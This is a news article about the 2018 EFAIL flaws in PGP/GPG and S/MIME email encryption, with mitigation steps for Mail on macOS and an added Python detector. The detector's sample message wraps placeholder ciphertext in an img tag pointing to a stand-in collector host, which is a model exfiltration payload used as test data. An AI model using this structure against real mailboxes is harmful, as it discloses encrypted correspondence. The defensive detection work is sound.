Ordinary users rarely use any protection when sending or receiving email. Some companies and individuals, however, rely on PGP, GPG and S/MIME to add a layer of protection to the messages they exchange.
We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4
– Sebastian Schinzel (@seecurity) May 14, 2018
According to Sebastian Schinzel, a professor of computer security, these protections have critical vulnerabilities that can reveal the plaintext of encrypted emails, including messages already sent. All information related to the vulnerabilities found will be published tomorrow, at 4 am (Brasília time).
For now there are no patches available, and the only thing you can do is disable PGP/GPG or S/MIME in your email client. The affected clients (with their respective encryption plugins) are: Thunderbird with Enigmail, Apple Mail with GPGTools and Outlook with Gpg4win.
The flaw involves using multipart responses to exploit HTML rendering issues. If an attacker obtains a person's encrypted email content, they are able to send the encrypted text back to the user and reveal the clear text form without having access to the sender's private encryption keys.
The attacker sends three parts (a partial declaration of the HTML img tag and a string of encrypted text, followed by the HTML for closing the image tag). This causes the email client to decrypt the text and make it the source URL of the fake image.
When the person opens the email in their client, the client tries to fetch the URL to load the image. The attacker's server records the request and keeps a copy of the unencrypted content.
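A defensive check for the message shape described above, as an added example that is not from the original article or from any of the affected projects: it flags an encrypted MIME part that directly follows an HTML part ending inside an unclosed URL attribute. The sample message, its host name and its ciphertext are constructed placeholders, and `find_efail_wrapping` is a hypothetical helper name.

```python
import email
import re
from email import policy

# HTML that ends inside a quoted URL attribute, e.g. <img src="http://host/
OPEN_URL_ATTR = re.compile(
    r"""<\w+[^>]*\b(?:src|href|background)\s*=\s*(["'])[^"'>]*\Z""", re.IGNORECASE)
ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime",
                   "multipart/encrypted", "application/pgp-encrypted"}

# Constructed sample: placeholder ciphertext and a reserved .invalid host name.
WRAPPED = b"""\
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B"

--B
Content-Type: text/html

<img src="http://collector.invalid/
--B
Content-Type: application/pkcs7-mime; smime-type=enveloped-data

UExBQ0VIT0xERVI=
--B
Content-Type: text/html

">
--B--
"""

def is_encrypted(part):
    """True for S/MIME or PGP/MIME parts and for inline ASCII-armored PGP."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    payload = b"" if part.is_multipart() else part.get_payload(decode=True) or b""
    return b"-----BEGIN PGP MESSAGE-----" in payload

def find_efail_wrapping(raw_bytes):
    """Return (index, content type) of encrypted parts that follow a dangling URL attribute."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    hits = []
    for container in (p for p in msg.walk() if p.is_multipart()):
        parts = container.get_payload()
        for i in range(1, len(parts)):
            prev, cur = parts[i - 1], parts[i]
            if prev.get_content_type() == "text/html" and is_encrypted(cur):
                if OPEN_URL_ATTR.search(prev.get_content().rstrip()):
                    hits.append((i, cur.get_content_type()))
    return hits
```

The heuristic only covers the adjacent-parts layout described in this article; a mail gateway could quarantine any message for which it returns a non-empty list.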
How to remove GPG Tools from Mail on macOS
If you happen to have the GPG Tools (GPGMail) plugin installed in Mail, follow the recommendation below to remove it until everything is properly fixed:
- Quit the Mail application (Mail > Quit Mail, or the shortcut ⌘Q);
- In the Finder, go to Go > Go to Folder (⇧⌘G);
- Type /Library/Mail/Bundles;
- Remove the GPGMail.mailbundle file (by dragging it to the Trash or by right-clicking it and choosing "Move to Trash");
- Enter your administrator password to confirm the operation;
- If you can't find the file in that folder, go back to step 2 and type ~/Library/Mail/Bundles.
That's it: when you open Mail again, the plugin will no longer be part of it.
On iOS it is simpler: just go to the Mail settings and disable the "Load Remote Images" option.
The flaw can be resolved with a software update and, of course, those responsible are already working on it.
As a temporary alternative for those who really need secure end-to-end communication, the best option is to move to a messenger such as Signal or iMessage (Signal also has a feature that makes messages disappear).
via MacRumors: 1, 2; 9to5Mac